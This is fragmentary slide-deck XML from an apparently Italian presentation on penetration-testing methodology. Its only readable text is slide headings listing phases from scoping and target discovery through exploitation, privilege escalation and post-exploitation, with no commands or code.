                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BAFCFD-E52D-C16E-E72C-CC4CAA299C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905301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Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC0D109-E6E8-8745-A06D-F862BDE306F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906604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4178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1A3260"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="25468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tangolo 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0A454C-8EBE-BFD1-BDE1-5AFF67ED2052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889533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2D574A72-4333-EDA4-E272-AF58B0A83CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614266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3064F1B-4547-A3B6-A9B2-E4A016EFB1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148797" y="1360665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9DAA0B11-ADC5-7C57-6D63-115CF6E911D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895340" y="1360952"/>
            <a:ext cx="2611973" cy="236512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2656F24F-3B3F-3B62-D95C-6128286003FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402253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74219E84-0E88-40C4-C060-721FB1639B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402254" y="134817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DD2DD3BF-1E82-13F6-8CC2-2E630E328286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630467" y="3859506"/>
            <a:ext cx="2611973" cy="2300961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4472C4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8EDEF159-E7E1-CED4-924E-33310161E37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629418" y="1348173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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="298112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TABLE OF CONTENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC90CC3D-05EE-6228-5A5A-6E9C219BAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718908" y="2803267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Uno sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793AF34-6614-AEA2-96F9-B50AE3CFF52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629417" y="242871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Strumenti Utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911EC704-3F17-828E-E68E-CD745D28D0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630720" y="154326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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B312B6-A920-5A54-5724-D7CF16D56138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476318" y="28033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“Scope” di cosa è stato analizzato</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4F4BB3-1CB0-3FD5-5EC6-F319DCE226E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386827" y="24288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Scoping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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1D64F-9D4F-A16C-C85C-964D00932EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388130" y="15433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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A1E0E7-1AA4-186E-5AEF-8AEF4132AA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238940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Recupero delle informazioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58708409-AA91-4FC6-7665-6A5061A16B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149449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Information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Gathering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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43A0249-E69B-B8D4-9A81-F8DEDFC6BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150752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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6219FA9C-AAF6-4C2A-6056-7244FA6A71BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993743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Individuazione della macchina </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B501273F-AFF0-F8BF-F9A6-E80D23535575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8904252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Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EF3834-B6F7-56F4-C86A-B487A5C68A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905555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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5322EF44-D519-CCB9-7D23-AB6F07BB05E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719957" y="5284522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dei servizi esposti dalla macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4535016-F30C-8954-26C5-82F629890E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630466" y="490996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Enumerating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Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49380DD-6FA6-B454-5070-7426BFA0D50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631769" y="402451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3" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBB894C-1FF8-7D81-16BB-969484823587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477367" y="52846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Analisi dei problemi di sicurezza della macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2C201-EB3D-AD5D-B471-9A67BFBAA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387876" y="49100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Vulnerability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Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4071A593-F62C-6F5D-6229-96CBDE5FC1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389179" y="40246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6" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974F0F60-73FF-9152-0B82-3AE630A4C40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239989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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A3F5AA-7955-2BD0-810C-4F774F96E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150498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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D69C5A-300A-813F-52B4-58346641FCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151801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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B8FCE1-50DE-B51C-50D9-AEAF9E6F3827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994792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Privilege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Escalation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Mantaining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Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BAFCFD-E52D-C16E-E72C-CC4CAA299C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905301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Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC0D109-E6E8-8745-A06D-F862BDE306F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906604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5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B9F3C-8AD4-65DA-DD79-DA0F801F92AD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Target discovery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1FEACF-C1F7-861F-064C-CA86856C335E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Ping scan</a:t>
            </a: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1681C00-FE99-80FB-AA79-2C12A1042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75" y="2824482"/>
            <a:ext cx="4562878" cy="3211964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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene testo, Carattere, schermata, tipografia&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4B43B3B-9059-D215-0E1B-AAAA559EA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132" y="1988716"/>
            <a:ext cx="3267075" cy="1628775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32E850BC-E277-9385-84B3-AF77E3F7C321}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4235980" y="3887895"/>
            <a:ext cx="1517227" cy="1070187"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 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96758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B9F3C-8AD4-65DA-DD79-DA0F801F92AD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Target discovery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1FEACF-C1F7-861F-064C-CA86856C335E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Os</a:t>
            </a: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 fingerprinting</a:t>
            </a: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6C24E04-A57F-9C38-30F8-E88014F31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81" y="1486557"/>
            <a:ext cx="5905880" cy="1736046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B50419A-0C95-95A8-8CCC-4C9AB9235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4" y="3429000"/>
            <a:ext cx="7281122" cy="3093464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C88FBDC8-CFDF-6EBF-8C42-E4B7D0FF66B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="765387" y="2059093"/>
            <a:ext cx="1449493" cy="223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2825847-C77C-D6B9-CE32-51921059F648}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4317994" y="5516878"/>
            <a:ext cx="5191766" cy="33528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66069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1A3260"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="25468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tangolo 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0A454C-8EBE-BFD1-BDE1-5AFF67ED2052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889533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2D574A72-4333-EDA4-E272-AF58B0A83CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614266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3064F1B-4547-A3B6-A9B2-E4A016EFB1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148797" y="1360665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9DAA0B11-ADC5-7C57-6D63-115CF6E911D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895340" y="1360952"/>
            <a:ext cx="2611973" cy="236512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2656F24F-3B3F-3B62-D95C-6128286003FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402253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74219E84-0E88-40C4-C060-721FB1639B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402254" y="134817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DD2DD3BF-1E82-13F6-8CC2-2E630E328286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630467" y="3859506"/>
            <a:ext cx="2611973" cy="2300961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4472C4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8EDEF159-E7E1-CED4-924E-33310161E37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629418" y="1348173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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="298112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TABLE OF CONTENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC90CC3D-05EE-6228-5A5A-6E9C219BAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718908" y="2803267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Uno sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793AF34-6614-AEA2-96F9-B50AE3CFF52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629417" y="242871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Strumenti Utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911EC704-3F17-828E-E68E-CD745D28D0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630720" y="154326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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B312B6-A920-5A54-5724-D7CF16D56138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476318" y="28033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“Scope” di cosa è stato analizzato</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4F4BB3-1CB0-3FD5-5EC6-F319DCE226E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386827" y="24288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Scoping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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1D64F-9D4F-A16C-C85C-964D00932EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388130" y="15433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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A1E0E7-1AA4-186E-5AEF-8AEF4132AA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238940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Recupero delle informazioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58708409-AA91-4FC6-7665-6A5061A16B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149449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Information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Gathering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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43A0249-E69B-B8D4-9A81-F8DEDFC6BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
